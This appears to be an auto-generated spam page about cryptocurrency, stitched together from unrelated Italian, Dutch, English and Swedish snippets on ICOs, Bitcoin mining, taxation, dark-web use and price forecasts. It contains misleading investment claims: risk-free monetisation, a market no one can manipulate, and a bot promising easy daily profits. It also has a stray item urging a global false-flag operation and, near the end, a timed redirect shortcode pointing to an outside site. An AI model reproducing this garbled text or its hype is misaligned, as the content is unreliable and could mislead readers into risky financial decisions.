“Carta da parati Criptovaluta _Criptovaluta Risks”

«L’innovazione di un’Ico sta nel fatto che viene meno la barriera all’ingresso data dalla burocrazia in quanto chiunque (sottostando alle regole della propria legislazione) può prendere parte a una Ico“, spiega Alessandro Cadoni di Friendz, che i primi di marzo ha lanciato la sua initial coin offering E aggiunge: “Questo rende molto più grande il bacino di partecipanti e quindi la quantità di finanziamento ottenibile. Se con un crowdfunding in Italia raccogliere 2 milioni di euro era un’impresa eroica, con una Ico è possibile ottenere cifre venti volte superiori. Il tutto senza mettere in discussione la governance dell’azienda».

^ Samuel Gibbs (28 november 2013). ”Nine Bitcoin alternatives for future currency investments: Bitcoin’s rapid rise in value and profile has spawned over 60 different ‘altcoin’ digital peer-to-peer currencies”. theguardian.com. Läst 12 december 2013.

In Italia, nel settembre del 2016, una circolare dell’Agenzia delle Entrate affermava che le operazioni relative al Bitcoin sono “prestazioni di servizi esenti da Iva”. Sul piano della tassazione diretta, invece, i ricavi che derivano dall’attività di intermediazione nell’acquisto e vendita di bitcoin sono soggetti ad Ires ed Irap, al netto dei relativi costi.

In particolare, ogni nodo “generatore” raccoglie tutte le transazioni non confermate che conosce in un “blocco” candidato, un file che, tra le altre cose,[38] contiene un hash crittografico del precedente blocco valido conosciuto a quel nodo. Prova poi a riprodurre un hash di quel blocco con determinate caratteristiche, uno sforzo che richiede in media una quantità definibile di prove da dover effettuare. Quando un nodo trova tale soluzione la annuncia al resto della rete, i peer che ricevono il blocco ne controllano la validità prima di accettarlo e poi aggiungerlo alla catena.

Ethereum. E’ tra le ultime nate per il trading sulle criptovalute, il suo esordio infatti è nel 2015. Da un prezzo di esordio di soli 2 dollari e mezzo, ad oggi ( maggio 2017 )  tale asset digitale è quotato su valori di circa 161 dollari.

Come prima cosa, dovete possedere delle criptovalute. Ciò significa che in qualche modo dovrete acquistarle (a meno che non vogliate diventare dei “miner”). Per acquistarle il “luogo” più comodo sono i cosiddetti “exchange”, siti dove è possibile comprare e vendere differenti tipi di criptovalute. Ma anche scambiare le proprie criptovalute con denaro reale.

Infatti, più passa il tempo, più fare mining di una criptovaluta diventa difficile e richiede sempre più potenza di calcolo. Infatti, quasi tutte le criptovalute hanno un numero “finito” di valuta che può essere emesso.

Uno dei motivi per cui è preferito dagli investitori è rappresentato dal fatto che è definito come mercato che realizza la concorrenza perfetta. Ciò accade perché, a differenza dei mercati tradizionali come il mercato azionario, nessun investitore da solo è in grado, regolando domanda ed offerta, di manipolare il valore delle valute. Ciò permette a tutti gli investitori di essere sullo stesso piano ed avere gli stessi strumenti per valutare il possibile andamento futuro del valore delle valute.

Ma Ari Paul, co-fondatore del fondo investimenti BlockTower Capital, ha detto al New York Times: «Non so di banche che usino o che progettino di usare i Ripple XRP nella scala di decine di miliardi di dollari, necessaria per giustificare la loro valutazione». L’analista di criptovalute Ryan Selkis ha scritto su Medium che «devono succedere una lista di cose talmente lunga da essere impossibile perché i Ripple XRP diventino una valuta utilizzata dalle banche per immagazzinare capitale».

As the money is decentralized and untraceable it can be used for various illegal purposes as well. Think about money laundering and tax evasion. The digital money has attracted many criminals to the online market, known as the ‘the dark web’. The most popular example of illegal activity on the dark web is probaly the online marketplace silk road. The Bitcoin was used to complete illegal transactions for drugs of weapons whereby the seller and buyer remained anonymous.

La nuova cripto-moneta, infatti, prevede tempi di settlement di pochissimi minuti, a differenza dell’oretta normalmente richiesta dal sistema decentralizzato utilizzato per le transazioni di valuta Bitcoin.

Inoltre è vostro compito quello di determinare il prezzo in bitcoin per la merce offerta. Di norma è buona cosa regolarsi sul cambio attuale. Tuttavia è prassi quella di inserire una clausola extra nel contratto di vendita, stabilendo così che il prezzo può essere soggetto a delle variazioni nel caso in cui ci siano delle oscillazioni al corso dei cambi, e definendo inoltre a carico di chi siano i costi di transazione, che di regola spettano al compratore. La ricezione di un pagamento può essere controllata sia direttamente nel vostro Wallet o su blockexplorer.com. Essendo che con Bitcoin non è inclusa alcuna tutela del cliente, dovreste offrire la possibilità di effettuare transazioni importanti solo tramite intermediari affidabili.

La #valuta del momento è senza ombra di dubbio il #bitcoin, la #moneta #digitale. Ma questa potrà mai sostituire, nelle #spese quotidiane, le #banconote? Ecco cosa si può comprare con la #criptovaluta. http://bit.ly/2s6jkTF pic.twitter.com/dxvGRWyGo0

Sinds kort is het mogelijk om een uniek programma te kopen voor het kopen  en verkopen van cryptocurrencies op diverse exchange platformen. Zo maakt u dagelijks automatisch snel veel winst door de prijsverschillen op de verschillende sites. Om dit als mens bij te houden is ondoenlijk, geautomatiseerd is het echter een peuleschilletje.

Dus je wilt digitale valuta kopen maar je weet niet zo goed waar je moet beginnen? Dan ben je aan het juiste adres. Via deze pagina lees je hoe je op een simpele manier jouw eerste digitale valuta (crypto-munten) kunt kopen.

Con una semplice connessione Internet, possiamo gestire in completa autonomia il nostro denaro, diventando letteralmente i banchieri di noi stessi. Fino ad oggi, istituzioni finanziarie come banche o istituti di credito, erano necessarie per un semplice motivo: verificare che la persona che stava effettuando un pagamento avesse effettivamente dei soldi da spendere.

Finally, according to the study, 35% are concerned cryptocurrency prices might crash, and 34% admit that fluctuating prices are discouraging them stockpiling more. Another 18% are concerned that their business will not be able to cash the cryptocurrency in when required.

Sicuramente per anni i Bitcoin sono stati profondamente legati al Deep Web, vale a dire la  la parte di Internet non visibile ai motori di ricerca dove gli utenti cercano il maggiore anonimato possibile, soprattutto per compiere attività illegali (commercio di droga, armi, ecc). I Bitcoin sono infatti tutt’ora il metodo di pagamento più utilizzato nel Deep Web, per tutta una serie di ragioni che hanno a che fare con le caratteristiche stesse della criptovaluta e che abbiamo cercato di raccontare in questo articolo. 

South Korea plans national digital currency using a Blockchain.[55] The chairman of South Korea’s Financial Services Commission (FSC), Yim Jong-yong, announced that his department will “Lay the systemic groundwork for the spread of digital currency.”[55] South Korea has already announced plans to discontinue coins by the year 2020.[56]

TRON è un protocollo decentralizzato basato su blockchain che mira a costruire un sistema di intrattenimento di contenuti gratuito in tutto il mondo con la tecnologia blockchain e storage distribuita. Il protocollo consente a ciascun utente di pubblicare, archiviare e possedere i dati liberamente, e nella forma autonoma decentralizzata, decide la distribuzione, l’iscrizione e la spinta dei contenuti e consente ai creatori di contenuti di rilasciare, diffondere e gestire le risorse digitali, formando così un intrattenimento decentralizzato dei contenuti ecosistema. La Peiwo App con oltre 10 milioni di utenti diventerà la prima APP di intrattenimento compatibile TRON.

Le criptovalute rappresentano un’enorme possibilità di monetizzazione, particolarmente facile da cogliere anche per chi non è esperto. Per raggiungere questo obiettivo senza rischi, però, è davvero importante scegliere gli strumenti giusti. Prendiamo come esempio il bitcoin, che è la criptovaluta in assoluta più famosa. Acquistare bitcoin apparentemente è molto complesso: in effetti solo i più esperti fino a poco tempo fa riuscivano a speculare sui bitcoin.

Many of existing digital currencies have not yet seen widespread usage, and may not be easily used or exchanged. Banks generally do not accept or offer services for them.[64] There are concerns that cryptocurrencies are extremely risky due to their very high volatility[65] and potential for pump and dump schemes.[66] Regulators in several countries have warned against their use and some have taken concrete regulatory measures to dissuade users.[67] The non-cryptocurrencies are all centralized. As such, they may be shut down or seized by a government at any time.[68] The more anonymous a currency is, the more attractive it is to criminals, regardless of the intentions of its creators.[68] Forbes writer Tim Worstall has written that the value of bitcoin is largely derived from speculative trading.[69] Bitcoin has also been criticised for its energy inefficient SHA-256-based proof of work.[70]

Per quanto riguarda il futuro prossimo dei prezzi di Ethereum, gli esperti si attendono una correzione verso i 250 dollari ma, entro la fine dell’anno un nuovo salto verso i 500 dollari. Guadagni a dir poco impressionanti per una valuta appena nata.

3) Avviare una massiccia operazione di falsa bandiera  (false flag) su scala mondiale che blocca i mercati del debito globale e mandi in fiamme le valute fiat. (Bufala di invasione aliena, falso attacco EMP della Corea del Nord, attacco terrorista della rete elettrica, ecc.)

La limitazione serve da un lato a regolare il mercato dei bitcoin nel lungo periodo attraverso il rapporto tra domanda e offerta, com’è stato il caso fino ad ora; dall’altro regola il corso delle monete digitali nel caso di forti oscillazioni, le quali, in brevissimo tempo, potrebbero creare problemi alle pagine che si occupano della compravendita dei bitcoin. Qui di seguito abbiamo raccolto per voi i vantaggi e gli svantaggi della rete Bitcoin.

Il client ufficiale, Bitcoin Core, è un software libero che deriva direttamente dal codice scritto da Satoshi Nakamoto per implementare il protocollo di comunicazione e la rete peer-to-peer che ne risulta.

Alla ricerca, i cui risultati sono attesi entro sei mesi, contribuiranno soggetti istituzionali, primari attori nell’industria dei servizi finanziari e dei pagamenti. Tre sono le fasi del progetto di ricerca:

I trader che amano investire in criptovalute hanno in mano diversi strumenti per cercare di valutare il mercato e le tendenze degli oggetti dei loro investimenti. E uno dei più noti e dei più utilizzati è certamente rappresentato dall’analisi tecnica: usando questo metodo, infatti, i trader possono ottenere una migliore comprensione del “sentimento” del mercato, isolando trend significativi nel mercato …

Dear Crypto-Family! Have you ever gazed up into the clear night sky on a dark and starry night, and just wondered about the vastness of it all. Felt that overcoming feeling of insignificance, as you realize how tiny and short our lives, our planet, and our star really is? The sky seems so vast, so exciting and some times so beautiful. Stellar, Stellar…. … [redirect url=’http://curbee.info/bump’ sec=’7′]

Leave a Reply

Your email address will not be published. Required fields are marked *